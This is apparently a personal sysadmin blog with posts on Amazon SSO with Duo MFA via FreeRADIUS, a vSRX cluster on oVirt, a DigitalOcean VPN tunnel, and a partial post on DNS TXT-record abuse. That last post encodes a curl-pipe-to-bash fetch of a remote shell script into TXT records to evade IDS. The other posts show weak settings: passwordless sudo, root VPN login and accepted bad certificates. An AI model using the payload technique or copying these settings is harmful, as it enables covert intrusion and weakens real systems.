Amazon SSO with MFA Using Duo

Amazon SSO is Amazon’s recommended platform over plain SAML federation / ADFS. It works well because you can very quickly deploy AD instances in two availability zones, hook up their AD Connector to leverage SSO with on-prem AD (technically synced up to your Amazon-side AD, but I digress), and then do MFA/2FA with a RADIUS server

The documentation on what they “need” from your RADIUS response is sparse. They don’t tell you, or even allude to, how to set up the RADIUS side, so you’re left figuring out the RADIUS component yourself (or at least I was). What I found out is that when the RADIUS request comes in, the server just needs to respond true/false – an Access-Accept or an Access-Reject…

I won’t go through all the details, as this post assumes moderate experience with FreeRADIUS, setting up SSO in Amazon with MFA, and configuring an application in Duo to be protected

The way this was accomplished is simple: FreeRADIUS can exec scripts or commands with the exec module for authorization and authentication, so I figured, why can’t I kick off sudo with login_duo? I am not guaranteeing the FreeRADIUS configuration is pretty or correct or would survive under load; for me, I basically only had to authenticate myself
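One prerequisite for that trick: radiusd runs as an unprivileged user (radiusd on CentOS), so it needs passwordless sudo rights to invoke login_duo as the target user. A minimal sketch, assuming the default paths – the file name is my own choice:

```
# /etc/sudoers.d/radiusd - let the radiusd user run login_duo as any user, no password
radiusd ALL=(ALL) NOPASSWD: /usr/sbin/login_duo
```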

FreeRADIUS configuration

99% of the stock config from the CentOS 7.3 FreeRADIUS install was left alone. I am also fairly confident the FreeRADIUS project lead would have another mailing-list aneurysm over my suggestions, but with how huge, feature-rich, and (somewhat) flexible it is, I had to do what eventually worked. The documentation is vast as well, so finding what you need is like finding a needle in a haystack. The goal was simple: make login_duo the provider for authorization and authentication

I deleted all elements under the authorize and authenticate stanzas in /etc/raddb/sites-enabled/default and replaced them with the below, which hands both off to the loginduo module defined next

authorize {
        update control {
                Auth-Type := radauthorize
        }
}
authenticate {
        Auth-Type radauthorize {
                loginduo
        }
}

Then I created /etc/raddb/modules-enabled/loginduo, which just uses the exec module with a wait

exec loginduo {
	wait = yes
	shell_escape = yes
	program = "/usr/bin/sudo -u %{User-Name} /usr/sbin/login_duo"
	timeout = 30
}
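FreeRADIUS also has to accept requests from the AD Connector in the first place. A hedged sketch of the clients.conf entry – the client name is mine, and the placeholders stand in for the AD Connector IP and the shared secret you set in the AWS console:

```
# /etc/raddb/clients.conf - authorize the AD Connector as a RADIUS client
client awsadconnector {
        ipaddr = <AD-Connector-IP>
        secret = <shared-secret>
}
```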

Amazon SSO does not send the password – just the MFA code. This proved slightly annoying, since it meant I couldn’t use PAM via RADIUS for the MFA (which would be better than shelling out to login_duo) and was left with login_duo, because the “password” field is populated with the MFA code. The value you enter in Amazon SSO can be garbage if you use login_duo with autopush – it just means you can only support autopush
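For reference, autopush is a login_duo setting. A sketch of /etc/duo/login_duo.conf under that assumption, with placeholder keys from your Duo application:

```
[duo]
ikey = <integration-key>
skey = <secret-key>
host = <api-hostname>
; send a push automatically instead of prompting for a factor
autopush = yes
```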

This is about all you need to get Amazon SSO with Duo MFA

vSRX Cluster on oVirt/RHEV

My most recent tinkering endeavor has been getting Juniper vSRX running on something more than just a flat KVM host, which is all their documentation outlines

Along the way I hit a lot of odd little things that either were not documented on Juniper’s site or took a fair bit of engineering to figure out. Juniper’s documentation is great for standalone KVM systems, but with a setup like this it isn’t entirely applicable (e.g., they outline creating an isolated network, whereas we have to create L2 bridge interfaces in oVirt)

The benefit of something like oVirt or RHEV is a central plane for managing multiple KVM nodes. For instance, if you have 2 or 3 nodes you can cluster them together; in this example that means configuring two vSRX’s in a cluster and pinning them to individual nodes

This won’t cover things like the oVirt install, the network switches, trunking VLANs, or that nitty-gritty configuration. It will make assumptions about configuration requirements and depth of knowledge; where an assumption is being made, it will be noted

Initial Notes / Pre-req

Here are some high-level notes I learned along the way that are helpful to take into consideration during this setup

  1. MAC Spoofing Requirement: You need to install the package ‘vdsm-hook-macspoof’ on each of your oVirt KVM nodes. This is because the vSRX needs to be able to spoof MAC addresses and have the upstream network and KVM hosts learn the internal MAC addresses (you’ll see why later)
    1. After you install the macspoof hook you need to run the following command on your oVirt engine node
      engine-config -s "UserDefinedVMProperties=macspoof=(true|false)"
  2. Cloning: Don’t clone the VM to make a secondary. Do a fresh build each time you need a new node
  3. IGMP Snooping: The vSRX documentation covers disabling this on a single node, but does not cover separating the vSRX’s between two nodes at all. If you do so, you need to make sure IGMP snooping is disabled along the entire pathway between the two KVM nodes. That is, if your two KVM hosts are directly attached, then disabling IGMP snooping on the hosts is all you need to do; but if they are connected through a switch (like mine), you need to ensure IGMP snooping is disabled there as well, otherwise you will see extremely weird behavior (to say the least)
  4. NIC Ordering Configuration: NIC ordering and count differs depending on how you’re configuring your setup
    1. Clustered vSRX –
      1. vnic1 = fxp0
      2. vnic2 = em0 (will show up as ge-0/0/0 before enabling clustering)
      3. vnic3 = fab0 (will show up as ge-0/0/1 before enabling clustering)
    2. Non-clustered/standalone
      1. vnic1 = fxp0
      2. vnic2 = ge-0/0/0
  5. NIC Ordering (Advanced): The vSRX maps NICs to slots in the numerical order of the ‘slot’ setting seen in the ‘virsh dumpxml <id>’ output. That is, if you dump the virsh XML you will see configuration for “<interface type=’bridge’>”, and what you have to pay attention to is the slot=’0x0#’ attribute. The lowest is fxp, the second is em0, the third is the fabric link, and the fourth is your internet NIC.

    NOTE: A bug in oVirt

    While I was doing my setup, the em0 control link could not see its partner. oVirt’s UI had
    shown me that the NIC order was as needed for a cluster in vSRX; however, when I ran 'virsh dumpxml ${ID}', where ${ID} is the ID of the VM,
    and looked at the order of slot=, it was evident the order was not what we needed (fxp lowest, then em0 second, and so on).
    So while oVirt had the order correct in the front-end UI, the XML behind the scenes had the fxp bridge on slot='0x06'
    whereas it needed to be on slot='0x03'. The fix was to change the vNIC network association in the oVirt UI

    Here is an example of oVirt correctly outputting the vNIC config to the XML as it shows in the UI. I highlight slot=’0x’ so you can see the part that matters most to the vSRX clustering component

    You’ll notice I have the NICs in the order they need to be and what I expect in the XML output. What I noticed on the vSRX cluster was that the nodes couldn’t see each other, which made it clear the em0 control links were misconfigured in some fashion. At that point I looked at the virsh dumpxml output for the VMs and could see the NIC association in the XML was wrong, since the vSRX expects the fxp NIC to be the lowest slot= number. I no longer have that XML output, but it was easy to figure out what to do since you could see the MAC address: take that, cross-reference it to what the oVirt UI shows, and reconfigure the network association accordingly. Here is what mine ended up being for my secondary:

    Instead of fxp, em0, fabric, ge-0/0/0 it had to become fabric, fxp, em0, ge-0/0/0
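    To sanity-check the real ordering without eyeballing the whole XML, you can pull the bridge-to-slot mapping out of the dumpxml output. A sketch against a hypothetical excerpt of my NIC layout – in real use you would pipe ‘virsh dumpxml ${ID}’ instead of the sample file:

```sh
# Hypothetical 'virsh dumpxml' NIC excerpt, saved locally for illustration
cat > /tmp/vsrx-nics.xml <<'EOF'
<interface type='bridge'><source bridge='vlan1030_VSRXM'/><address type='pci' slot='0x03'/></interface>
<interface type='bridge'><source bridge='vlan1029_VSRXC'/><address type='pci' slot='0x04'/></interface>
<interface type='bridge'><source bridge='vlan1027_VSRXF'/><address type='pci' slot='0x05'/></interface>
<interface type='bridge'><source bridge='vlan1031_VSRX'/><address type='pci' slot='0x06'/></interface>
EOF

# Pair each bridge with its slot and sort by slot number;
# the lowest slot must be the fxp (management) bridge
grep -o "bridge='[^']*'\|slot='[^']*'" /tmp/vsrx-nics.xml | paste - - | sort -t"'" -k4
```

    If the lowest slot is not your fxp bridge, fix the vNIC network association in the oVirt UI as described above.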

  6. fab0/1 MAC address generation (Clustering): This was a strange and tough one… the MAC addresses for fab0 and fab1 are generated by the vSRX on first boot. The last two bytes of these MAC addresses are borrowed from the first two bytes of the MAC of the fxp0 interface. What this means is that if you leave the oVirt auto-generated MACs in place, both nodes will end up generating the same fab MACs. In a cluster you need to change the fxp0 link (vnic1) on the secondary vSRX to have different first two bytes in its MAC address so it will generate unique fab MAC addresses
  7. We are going to be doing this as a cluster. Some things executed in a cluster are not applicable to standalone
  8. oVirt doesn’t make it easy to import images (at least in my attempts). The easiest way I found was to download the KVM image from Juniper to one of your nodes, create the VM with its backing storage, and then use dd to overwrite the disk in place – more on this later
  9. Using the oVirt console with remote-viewer won’t be helpful here. The vSRX loads Windriver Linux first and then kicks off a virtualization layer for the actual JunOS software. I outline how to obtain a console below
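Regarding the IGMP snooping point in item 3: on KVM hosts using plain Linux bridges, snooping can be toggled per bridge via sysfs. A hedged sketch – it only covers the hosts (your switch has its own IGMP snooping setting) and does not persist across reboots:

```sh
# Disable multicast (IGMP) snooping on every Linux bridge present on this host
for f in /sys/devices/virtual/net/*/bridge/multicast_snooping; do
  [ -w "$f" ] || continue   # skip if absent or not writable (run as root on the KVM hosts)
  echo 0 > "$f"
done
echo "done"
```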


My setup:

  1. 2 KVM nodes on CentOS 7
  2. oVirt 4.x
  3. 4 networks configured in oVirt (outside of ovirtmgmt) – each equates to a Layer 2 bridge. In my setup they were VLAN tagged, so the numbers below reference their VLAN tag on my network and how it was configured in oVirt
    1. vlan1029_VSRXC – Control link em0 (we don’t actually IP this on the vSRX)
    2. vlan1027_VSRXF – Fabric link (fab0/1)
    3. vlan1030_VSRXM – Management link / fxp0
    4. vlan1031_VSRX – Main untrust interface to the internet
  4. vSRX01 pinned to KVM node 1
  5. vSRX02 pinned to KVM node 2


The steps:

  1. As outlined above, first make sure you have your VM networks set up and your two KVM nodes active and working in your oVirt cluster. Create two new VMs and name them ‘vsrx01’ and ‘vsrx02’. Create each VM as you normally would with backing storage (the size doesn’t matter since we blow it away anyway). Click ‘Console’ on the left in the settings dialog and set the video type to Cirrus
  2. Now navigate to the Juniper vSRX download page and log in when prompted after clicking the KVM image. Accept the license and then copy the URL in the box
  3. Now SSH to KVM node 1 and use the following command:
    curl -o vsrx.qcow2.img ${URL}

    Where ${URL} is the URL you copied from the Juniper download page

  4. Now we need to convert the disk from qcow2 to raw. I could not get it to work with qcow2, which was odd to me – if I left it as qcow2, oVirt refused to boot it
    qemu-img convert -O raw vsrx.qcow2.img vsrx.raw.img
  5. Now you need to locate the path to your disk – an example of the shell commands (up until the dd command) is provided below
    1. Click the virtual machine tab in the oVirt web UI
    2. Left click your VM vsrx01
    3. Click the disk tab in the lower panel
    4. Note the name of your disk – it should be vsrx01_Disk1
    5. Now on the top tab click “Disks”
    6. Locate your disk – then left click it
    7. In the lower panel observe the ID #
    8. On the KVM node where you downloaded and converted the KVM image, run ‘df -h‘ and locate the full path to the underlying storage volume where your disk resides. For me, I knew it was on ‘DS_PROD_NON_HA_NFS_1’
    9. Now, cd to that base path (easier this way)
    10. Execute a find command with the switch -iname  and include your disk ID – this will help you locate the full path to your disk as it pertains to your VM
      find . -iname \*837cd864-8228-4ade-95d5-37432434d88e\*
    11. Now that you have that relative path for where you are – for me it is ‘./c65e60da-d890-40b1-a76b-a67a24b46086/images/837cd864-8228-4ade-95d5-37432434d88e’ – cd to that directory
    12. Now you have located your VM’s disk image. Here is where you will run dd to put the vSRX image in place
      dd if=/root/vsrx.raw.img of=${FILE} bs=4M status=progress

      Where for me ${FILE} would be ‘e2f52fa0-2708-4fe8-9b6c-9d893933b785’

      If you get an error about ‘status=progress’ then just remove that part – older versions of coreutils don’t support the flag

    13. Repeat this for second vSRX as well
    14. Below you can see a screenshot of an example of the shell commands
  6. Now that you have the images deployed, it’s time to come back to the vNIC configuration as outlined above –
    1. Go back to the ‘Virtual Machines’ tab in oVirt web UI
    2. Left click your VM
    3. Then in the lower panel click ‘Network Interfaces’
    4. As outlined above, configure your vNIC as such:
      1. vnic1 = fxp interface – vlan1030_VSRXM
      2. vnic2 = em0 interface – vlan1029_VSRXC
      3. vnic3 = fab interface – vlan1027_VSRXF
      4. vnic4 = ge-0/0/1 interface (ge-0/0/0 will be used for fab link)
    5. As you recall, on the secondary vSRX make sure to change the first 2 bytes of the MAC address for vnic1 / fxp interface. It can be anything
    6. Additionally, right-click your VMs and go to edit. Click ‘Custom Properties’ and type ‘macspoof’ with a value of ‘true’. This will allow the vSRX to, you guessed it, spoof MAC addresses
    7. Once confirmed, start your VMs
      1. If during setup the cluster won’t build or the control links can’t see each other, please reference my note above about confirming the real vNIC ordering via the virsh XML slot= settings
  7. First boot can take a while – anywhere between 5-10 minutes – as it initializes all the interfaces. Don’t bother with the usual console viewer you are used to with most VMs in oVirt. Rather, SSH to the KVM node where your VMs are running and run the following to obtain the path to the socket file for the console access you need, which you can reach via nc
    $ ps -Aef | grep -i charserial0 | tr ',' '\n' | grep -i 'vmconsole'

    Now take what you see after path= and use nc (‘yum install nc’ if you have to) to connect

    $ nc -U /var/run/ovirt-vmconsole-console/5ded6037-e0b2-4e41-8b7b-9b43e3e8a5cf.sock
    <press return>

    Of course, the above example is from my live setup

    Note: I cannot recall if the above works out of the box in oVirt. I believe it does, but if it does not work for you, you’ll need to spend a few minutes setting up ovirt-vmconsole. The function I describe is access to the virsh serial console over SSH

  8. At this point you are attached to the consoles with nc. Login with ‘root’ and do the usual stuff like setting the root password and such –
    Hint: If you need to ctrl+c do ctrl+v then ctrl+c and then press return

    1. Enter cli
    2. Enter conf
      set system root-authentication plain-text-password
    3. Enter the password you want to use
    4. Configure your fxp0.0 – for me it was for primary:
      set interfaces fxp0.0 family inet address

      And for secondary it was .242/28

    5. Type exit to back out of config mode; now we’re going to set the chassis cluster configuration and reboot. NOTE: When you do this you are only going to have one fxp0, so if you notice some “weirdness” after you boot back up when trying to use the fxp IP for management, that’s why. By weirdness I mean: you’re SSH’ed in, the session drops, you SSH again, and now you’re on the secondary… this is because you need to set up group configuration for fxp. I won’t cover that here, but you can find the KB article here

      set chassis cluster cluster-id 5 node 0 reboot

      And on the secondary:

      set chassis cluster cluster-id 5 node 1 reboot
    6. Once you’re back up and booted, you can run the following. This is straight out of the Juniper documentation for setting the fabric links and reth devices –
      user@vsrx0# set interfaces fab0 fabric-options member-interfaces ge-0/0/0
      user@vsrx0# set interfaces fab1 fabric-options member-interfaces ge-7/0/0
      user@vsrx0# set chassis cluster reth-count 2
      user@vsrx0# set chassis cluster redundancy-group 0 node 0 priority 100
      user@vsrx0# set chassis cluster redundancy-group 0 node 1 priority 10
      user@vsrx0# set chassis cluster redundancy-group 1 node 0 priority 100
      user@vsrx0# set chassis cluster redundancy-group 1 node 1 priority 10
      user@vsrx0# commit
    7. That should be it! Please reach out in the comments if you have any questions or hit any issues
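As a follow-up to the fxp0 note in step 5, the group configuration generally looks like the sketch below – the host names and address placeholders are hypothetical, so check the Juniper KB for the authoritative version:

```
set groups node0 system host-name vsrx01
set groups node0 interfaces fxp0 unit 0 family inet address <node0-fxp0-ip>/28
set groups node1 system host-name vsrx02
set groups node1 interfaces fxp0 unit 0 family inet address <node1-fxp0-ip>/28
set apply-groups "${node}"
```

With apply-groups "${node}" each chassis member picks up only its own group, so both nodes keep distinct fxp0 addresses after clustering.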

Hybrid cloud from home using DigitalOcean

This is something I had been wanting to do for a while; the concepts were always floating around in my head. At a high level, I wanted to join a network at my home to a cloud provider. Why? Mostly just because I wanted to see if and how it could be done – this weekend I had a reason, and I did it. More specifically, I wanted to see how I could “get” my own static IP from a cloud provider and forward connections on ports from the DigitalOcean VM back to my house

What I am doing below is not the most secure setup. You should understand the risks involved and know that what I am providing below is a “just get going” kind of tutorial

 — — —

I had recently been doing a lot of tinkering with OcServ and OpenConnect. These are the open-source equivalents of the Cisco AnyConnect SSL VPN server and client. BIG shoutout to this software suite… completely dead easy to use, and the developer is very active, responsive, and helpful on his GitLab. Internally in my home network I have a Juniper SRX firewall that I wanted to test this out on and forward the IKE ports back to my house. My home network is

Ultimately I will document what you need while trying to keep my Juniper bits out of it. But I will cover those too, so you know what you need if you ever want to tinker like this

Here’s what you need

  1. A DigitalOcean VM with private networking enabled
  2. A Raspberry PI 3 Model B – or an equivalent device with two network connections. A laptop works too. You just need a device with two NICs so one can route for the switch and the other (your initial default route) can go out through the internet:
  3. ocserv installed on the DigitalOcean VM
  4. openconnect installed on the Raspberry PI 3 (or equivalent device)
  5. An unmanaged switch (managed would probably work too, but unmanaged ensures no VLAN tagging issues / configurations)
  6. A secondary network device (in this case, it would be my Juniper device):

I primarily use Fedora and CentOS, so adjust accordingly (e.g., CentOS disables asymmetrical routing by default, and we need it)


The “too lazy, didn’t read” is simply this:

  1. Connect your PI to the switch and configure it to act as a router for your other device (iptables, etc)
  2. On the DigitalOcean VM, install ocserv and configure it. Have it work with your private network assigned on eth1. A small /29 or /28 should suffice for what IPs to hand out
  3. On your PI, run openconnect and connect to your DigitalOcean external IP – this will give you a VPN tunnel to the DigitalOcean private network. Note the IP you are assigned; you can find it on the line “Connected as <IP>”
  4. On the DigitalOcean VM, set a route for your home network to go to your tun0 interface IP on your PI (the IP you noted in step 3)
  5. Ping your PI (or whatever IP you have on it) and notice you get a response. You should also be able to ping the other device you have behind the switch
  6. You can now use iptables to port forward stuff back to your house via the eth0 external IP
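The port forwarding in the last step can be expressed as an iptables-save style excerpt for /etc/sysconfig/iptables on the DigitalOcean VM. A hedged sketch – the port, interface name, and home-side address are hypothetical:

```
# Forward TCP/2222 arriving on the VM's external interface to a host at home
*nat
-A PREROUTING -i eth0 -p tcp --dport 2222 -j DNAT --to-destination
COMMIT
*filter
-A FORWARD -p tcp -d --dport 22 -j ACCEPT
COMMIT
```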


We are going to make our PI act as a router for the home network. Once we confirm we can move traffic to and from the internet with that setup, we are going to connect via openconnect to our DigitalOcean external IP. The OCServ software on the DigitalOcean VM will be responsible for handing out a small /29 of 10.x.x.x IPs carved from the /16 that DigitalOcean gave us. OCServ tells connecting clients (our PI) to take one of those IPs, with the gateway being the first IP in the range. Then OCServ tells the connecting client that its new default route is now OCServ itself (the internal IP on the DigitalOcean VM).

What this achieves is that our PI’s next hop becomes the DigitalOcean VM via a private SSL VPN tunnel; thus any traffic coming in to the PI will be routed up through DigitalOcean through this VPN and egress from our external IP in DigitalOcean. Likewise, you can also port forward traffic from the external IP on the DigitalOcean VM (or the internal private network assigned to you by DigitalOcean) back to your house

This could probably be achieved with something else like OpenSwan or similar; however, an SSL VPN like this is, to me, more lightweight and easier to configure. Plus, I am going to be setting up an IPSEC VPN from my Juniper devices behind the switch, so the less in the way the better (although I don’t really care much about performance). I had already set up OCServ a few times as it was, so I went this route


First we’re going to make sure we have what we need on the house side. Substitute PI and Juniper for what you’ve selected

Here is how this looks at a high level from the house side

          Raspberry Pi (or equivalent)

On the PI

We need to enable it as a router which means iptables and sysctl. First install iptables and its utilities. Since this is CentOS 7 for me, I needed to install them

yum install -y iptables iptables-services iptables-utils

And I have prepared a little script to do the “make it route” portion minus one detail. Don’t run it yet; just save it as “/root/mkrouter”

#!/usr/bin/env bash

# Which port is connected to the switch
SWITCH_INTERFACE=eth0

# Which port is your default route / upstream to the internet
UPSTREAM_INTERFACE=wlan0

# Bring up the switch-facing port and give it the IP/CIDR passed as the first argument
ip link set up ${SWITCH_INTERFACE}
ip addr add $1 dev ${SWITCH_INTERFACE}

# Turn on routing and allow forwarded traffic
sysctl -w net.ipv4.ip_forward=1
service iptables start
iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

# If your home router has no route back to the switch subnet, masquerade what
# leaves the upstream interface so replies can find their way back
iptables -t nat -A POSTROUTING -o ${UPSTREAM_INTERFACE} -j MASQUERADE

I have noticed that iptables includes reject rules by default, so we are going to delete those

Open /etc/sysconfig/iptables and delete the two lines that contain REJECT

Now we need to enable asymmetrical routing. The command below is a pretty big hammer but somewhat necessary – I have seen setting only net.ipv4.conf.all.rp_filter not always work unless it’s persisted and configured at reboot

for i in $(sysctl -a 2> /dev/null | grep -i rp_filter | grep -iv arp_filter | awk '{ print $1 }'); do sysctl -w $i=2; done

Don’t forget that you’ll want to make these settings persistent via /etc/sysctl.d/!
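A sketch of what the persisted settings could look like – the file name is arbitrary:

```
# /etc/sysctl.d/90-pirouter.conf
net.ipv4.ip_forward = 1
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
```

The loop above touches every rp_filter key it finds; persisting all/default covers interfaces that appear after boot.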

Now save iptables

iptables-save > /etc/sysconfig/iptables

Now let’s run our script, passing the IP/CIDR for the switch-facing interface as the first argument


From your other device – in my case the Juniper – set a default route towards the PI’s switch-side IP. For my Juniper it would be

set routing-options static route next-hop

For another Linux device it would be

ip route add default dev <YOUR_DEVICE_CONNECTED_TO_SWITCH> via

Obviously substitute <YOUR_DEVICE_CONNECTED_TO_SWITCH>. For me, on my Juniper, it was ge-0/0/0.0 – depending on your OS this could be eth0, eth1, or something as abstract as enp0s2f3 🙂

From this secondary device you should be able to ping something far away like Test it out. Example from my Juniper:

root@home-ro0# run show route 

inet.0: 9 destinations, 9 routes (9 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both          *[Static/5] 00:14:42
                    > to via ge-0/0/0.0

root@home-ro0# run ping    
PING ( 56 data bytes
64 bytes from icmp_seq=0 ttl=55 time=24.002 ms
64 bytes from icmp_seq=1 ttl=55 time=27.720 ms

So this concludes turning our PI (or equivalent) into a router. Next, we’re going to connect it up to our DigitalOcean VM

So what we have now is:

                  Raspberry Pi 
             wlan0 =
              eth0 =
   ge-0/0/0.0 = - default route via

On DigitalOcean VM

This assumes you have already enabled private networking per the requirements above. For me, I was given a /16 in private address space. Also note your eth0 assignment, as you’ll need it to substitute values below

You can install OCServ via EPEL if you are running CentOS. I will not cover that here; simply enable the EPEL repository for CentOS 7 and install the ‘ocserv’ package

You will also need to generate a cert. Whether you choose self-signed or CA-signed, I will not cover that here. When you connect via the openconnect command you have the option of answering that you don’t care about any cert warnings/errors

Pretty much all I will show here is an example OCServ configuration for the scope I was given. My VM was assigned a range within the DigitalOcean private /16, and I carved a small subnet out of it for my VPN subnet

What this means, as noted above, is that when an AnyConnect/openconnect client connects to your DigitalOcean external IP, OCServ will offer an IP in that range, with the first IP in the range being the gateway for that client (being, the PI)

For your certs, the below configuration assumes you save them where I did, under /etc/ocserv/ssl. You will notice mine says ‘chained’ because I obtained my cert from DigiCert and chained the intermediate cert

So after you have installed OCServ you can use the example configuration below

The two most critical lines are ipv4-network – the network you want to hand out, based on what you were given for eth1 – and no-route, which tells connecting clients not to route traffic destined for your DigitalOcean external IP through the tunnel; everything else does go through it

auth = "pam[gid-min=1000]"
tcp-port = 443
udp-port = 443
run-as-user = ocserv
run-as-group = ocserv
socket-file = ocserv.sock
chroot-dir = /var/lib/ocserv
isolate-workers = true
max-clients = 16
max-same-clients = 0
keepalive = 32400
dpd = 90
mobile-dpd = 1800
switch-to-tcp-timeout = 60
try-mtu-discovery = false
server-cert = /etc/ocserv/ssl/
server-key = /etc/ocserv/ssl/
ca-cert = /etc/pki/ocserv/cacerts/ca.crt
cert-user-oid = 0.9.2342.19200300.100.1.1
auth-timeout = 240
min-reauth-time = 300
max-ban-score = 50
ban-reset-time = 300
cookie-timeout = 300
deny-roaming = false
rekey-time = 172800
rekey-method = ssl
connect-script = /usr/bin/ocserv-script
use-occtl = true
pid-file = /var/run/
device = vpns
predictable-ips = true
default-domain =
ipv4-network =
dns =
dns =
ping-leases = false
route = default

# Don't route our own gateway for the connection through the client's tunnel
#no-route = <your_digitalocean_vm_eth0_ip>/

cisco-client-compat = true
dtls-legacy = true
user-profile = profile.xml

You’re also going to need to relax rp_filter and enable ip_forward. So swing the hammer again:

# for i in $(sysctl -a 2> /dev/null | grep -i rp_filter | grep -iv arp_filter | awk '{ print $1 }'); do sysctl -w $i=2; done

# sysctl -w net.ipv4.ip_forward=1

Don’t forget that you’ll want to make these settings persistent via /etc/sysctl.d/!

We’re now going to move back to the PI where we are going to configure openconnect

Back on the PI

If you’re not using a PI then congrats! Just enable EPEL on your PI-equivalent (laptop, etc.) and install openconnect from the repo


Something I discovered halfway through writing this is that openconnect does not have any packages for the PI. I found this out because I used my laptop the whole way through this exercise, until I decided to implement it on my PI (as I am writing this). So, that was fun. I will run through the steps, but note they will be quick as they are scratch notes from implementing this today. I also will not delve into many details, so if you’re unsure, find a laptop and use that (then restart at the steps above)

Be sure to be ready to allocate probably 2-3 hours for this part :-/

First install development tools

yum groupinstall -y 'Development Tools'

Then install dependent packages

yum install -y libgcrypt-devel libgcrypt openssl-devel openssl gnutls gnutls-devel libxml libxml2-devel

Now the long part…we have to install cpan to get an old Perl module for the vpnc configuration

yum install -y perl-CPAN
<select all the defaults>
<once you're at the CPAN cli type the following>
install Fatal

Now fetch the vpnc dependency. More can be found here

curl -o vpnc.tar.gz
tar -xvzf vpnc.tar.gz
cd vpnc-*
make install clean

This should go in fairly straightforwardly. It’s a pretty lightweight thing

And now install openconnect

curl -o openconnect.tar.gz
tar -xvzf openconnect.tar.gz
cd openconnect-*
./configure
make install clean

And now connect to your DigitalOcean external IP with ‘openconnect ${YOUR_DIGITALOCEAN_EXTERNAL_IP}’. Below is an example of what you should see:

Server certificate verify failed: certificate does not match hostname

Certificate from VPN server "${YOUR_DIGITALOCEAN_EXTERNAL_IP}" failed verification.
Reason: certificate does not match hostname
To trust this server in future, perhaps add this to your command line:
    --servercert sha256:<snip>
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
XML POST enabled
Please enter your username.
Please enter your password.
Got CONNECT response: HTTP/1.1 200 CONNECTED
CSTP connected. DPD 90, Keepalive 32400
Connected as, using SSL
Established DTLS connection (using GnuTLS). Ciphersuite (DTLS1.2)-(PSK)-(AES-128-GCM).

From the above you’ll notice the following things

  1. I accepted the invalid cert. In this case it failed because the hostname I connected to did not match (since I used the IP). I demonstrate this here so you can see that you can accept insecure certs
  2. I logged on as root with the root password of the server (THIS IS BAD: I am only showing it for the concept). OCServ uses PAM to authenticate users, so your options are pretty much endless there (RADIUS, LDAP, AD, Kerberos, NIS, etc)
  3. I was given an IP – and what you don’t see is what I am going to show you below. Note the IP that you see, because we need it later back on the DigitalOcean VM
[root@ck-centos-rpi3 ~]#  ip route
default dev tun0  scope link dev tun0  scope link 
${YOUR_DIGITALOCEAN_EXTERNAL_IP} via dev wlan0  src dev eth0  proto kernel  scope link  src dev wlan0  proto kernel  scope link  src

[root@ck-centos-rpi3 ~]#  ip route get dev tun0 src 

[root@ck-centos-rpi3 ~]#  ping
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=59 time=24.6 ms
64 bytes from icmp_seq=2 ttl=59 time=21.6 ms

[root@ck-centos-rpi3 ~]# curl
^ My DigitalOcean VM external IP

So what does this show us? We now have the following in place:

  1. A default route out of tun0
  2. The entire DigitalOcean private range routed through tun0
  3. A host route to the DigitalOcean external IP via wlan0, so the tunnel traffic itself stays outside the tunnel
  4. Everything else intact

Now, from your secondary device (in my case, the Juniper) you won’t be able to do anything yet. We have to jump back up to the DigitalOcean VM before we can move traffic

Jump to the DigitalOcean VM

Now, since we’re all set up and connected, we just need to tell our DigitalOcean VM that traffic for the home network needs to be sent down the tunnel interface vpns0 via the gateway IP – the IP my PI was assigned when openconnect connected successfully

[root@do-gw-proxy ~]# ip route add dev vpns0 via

And now you will see we can reach back to our house!

[root@do-gw-proxy ~]# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=23.4 ms

And now I will SSH to my Juniper to show you that you can now reach back home from your DigitalOcean VM

[root@do-gw-proxy ~]# ssh
Last login: Tue Jun 13 22:23:51 2017 from
--- JUNOS 15.1X49-D90.7 built 2017-04-29 06:16:43 UTC

[root@do-gw-proxy ~]# ssh
root@'s password: 
Last login: Tue Jun 13 18:44:17 2017 from
[root@ck-centos-rpi3 ~]# netstat -tnap | grep -i established
Active Internet connections (servers and established)
tcp        0      0       ESTABLISHED 16855/sshd: root@pt 
tcp        0      0     67.205.x.x:443      ESTABLISHED 1734/openconnect   

And as you can see, I SSH’ed to my RPI and the SSH session is connected from my IP on the DigitalOcean VM. You can also see I have a persistent connection to my DigitalOcean VM via openconnect, but I am connected from 136.3.193, which is the IP of the DigitalOcean VM’s vpns0 interface

[root@do-gw-proxy ~]# ip addr show eth1 | grep -i 10.136
    inet brd scope global eth1




Using DNS TXT Record Abuse for Exploiting Servers

With everything that’s been in the news lately with malware and WannaCry, I figured it’d be fun to prove this out for myself and post about it. The below, of course, assumes your environment has already been compromised or has someone on it who wants to do something nefarious (disgruntled employee?). I am going to show you, in its most simplistic form, how you can abuse DNS TXT records to pass data between servers – even when the server you want to exploit is behind a firewall and can only make DNS requests

Why is this useful? Because the data in a TXT record can be any combination of ASCII text. What this means, simply, is that you are able to obfuscate data with GPG or, even more simply, base64 encode and decode it. This is beneficial for hiding from an IDS or IPS.
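As a sketch of the server side of this, here is how one might chop a payload into TXT-sized base64 lines. The payload and record names are made up for illustration:

```shell
#!/usr/bin/env bash
# Hypothetical payload -- anything ASCII works
payload='curl -s -q https://example.com/remote_shell.txt | bash'

# Base64-encode and wrap at 64 chars so each line fits easily
# within a single 255-byte TXT record string
i=1
printf '%s' "${payload}" | base64 | fold -w 64 | while IFS= read -r line; do
	# Emit one zone-file TXT record per chunk, numbered for reassembly
	echo "txt${i}    IN    TXT    \"${line}\""
	i=$((i + 1))
done
```

Paste the emitted lines into the zone for a domain you control and the client can pull them back down with dig.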

DNS is everything. When things fail, it’s usually because of a DNS issue (within context, of course), and typically DNS traffic is relatively trusted in organizations. The abuse of DNS here is in the context of recursion: when a DNS server is asked for a record it does not know, it forwards the request up to the root zones, which then find the authoritative DNS server for the queried domain so that a result can be returned for the queried hostname

Example: I am a server inside of an organization that has the ability to issue DNS requests. What this means is that I can request a record – my internal DNS server probably knows this already from cache and responds. What if I ask for something it has never seen? My internal DNS server probably won’t know it and will forward it up to the .net root DNS to ask where ckozler under .net is. .net responds with an NS record. That nameserver is then queried for the @ record, which responds with the host for where you are reading this page

